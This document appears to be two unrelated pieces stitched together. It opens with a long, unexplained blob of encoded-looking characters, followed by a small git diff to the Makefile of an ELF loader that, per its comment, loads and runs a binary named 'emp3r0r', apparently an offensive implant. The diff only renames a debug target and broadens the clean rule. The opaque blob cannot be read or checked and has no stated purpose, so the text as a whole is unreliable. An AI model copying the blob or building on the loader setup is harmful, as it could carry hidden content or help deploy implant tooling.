WBJHcyNZjNBiRyWcawgnnyaftVRHjTePl382DKVNhSfV4kYVp795g5jBaejenXlIWomv2qjM6v-q6t6y2pH2CuKQUCF4bCLJ_tgQQhgNe8Ckt42jtNvrxXW_iKtSiA6uuL9oMjRZRyvpgUNV3YfNa62JlZMjYXquvstmGaNq2wHqMB8gGAJggcgOsNjSIJhmNkHVlIDqYZBCK1cwyEoMYkDGITnIQun7x6iUGNo82_Wl1432ISMTYCaLM2RYBhys8E6RhJzW4vjSS7n3FGHKpBRYTIZgM81KxT6L8CyNjNIzrBijgnW-FizWMdnJeAgElX6VsUqYAfspr9LN9J8JB6vcpuMksosvE15AQYEWQJiTW-4MymGKZSmmoSQ9BJNgRCQSu6jrOeAkQVEMaQ7LB9km4aB50GOCKBDa2jX2OLUpoZneWEqBEjHBXYTISnd7BIKzcPGGWy1YosVHQiCEwEw3Q1pMeQo1s8su547MMCEBaipCtCEGKwmLIpJY9GTlg7GgHLH77Q8rn76wdlvILDuaLNvzti_bNotL_P55VlgOJzPC7Qf_Od8my-_6ul5Fcea3Q03IbG7P4-Hyerga7U6vZ96FmZ7EdZELWtEgdyCCvvmCbFYiAbcjek8XHDSbbqsrMKr8mTPKSQCRCCM5SKBYJgUVyfyl_Hz8DqzkEi6wP87Pc-_ruTl97-2q7c1xp_c9bdfL_fp_19Fk2x9V-q743tSEJSEIxHbkIs5n-f-KSiNgCwUQg4vb_Lr_3tv2nw7_6cj-rF_9fdwqDR-N-OmI4ONemN0jSIbeOc12i7al14TbOUlNdl6Xy8zL9Oyws1Zij6-40nD69Xj6PrUX5G0GEwQQ7fa9T0ZIrvodHt7q5dyB_mB_fT4XID-V9Pz_N4i6vJ9rhyfenmxPy9PUzEWt0R5KbV5p58yIGKCUQoUTN2cxOTeiH4OPz_HzdHv74g-HY9gC6Bt3OFYne-SwBAwESB1lD3UPZ-_gbj4vX4uVLy9Fo8bR4N7M_7l9XApppppppppppppuYeaD0mAGoyYZoiG_1DDAf8jcFLuYMDBzzUY9aBnIY2iEmGZd3_U_3RMMzofWQd6lP44wAuIozcZ_R6qhs4NRm61hz6fPaXsb2WalTjlnlAmkYXqew7gcHOE0r4auhFMIItFhIMJ1DeJRZrT0Jp2ZrWPLrXbv_Y-Rm1K9ixbHbouEjLs-B1Ja-xUwqda1hTU61XXGUniKAuULNtVoCMG_ulfV7dhqrjblLoNTcfDgXZMLDrYOd6yjT5dgA6TEfOXRLCQmeSHY_cMcBIkKejU0cv86bwldtErk01UiSzSzfTV6-BUrG2JDhT1-4vzRnn7yzdu3bt27pKnosaZkf8LuSKcKEgnbIgpA`
diff --git a/loader/elf/Makefile b/loader/elf/Makefile
@@ -4,7 +4,7 @@
 # run demo.exe and loader.so will be opened, put some binary called `emp3r0r` and it will be executed
 all: loader_so runner_so demo
 
-debug: so_debug demo
+debug: loader_so_debug demo
 
 runner_so:
 	${CC} -DOS_LINUX -DARCH_X86_64 runner.c -o runner.so -pie -fPIC -shared -nostdlib -nodefaultlibs -s
@@ -19,4 +19,4 @@ demo:
 	${CC} demo.c -g -ldl -o demo.exe
 
 clean:
-	rm -f loader.so demo.exe
+	rm -f *.so *.exe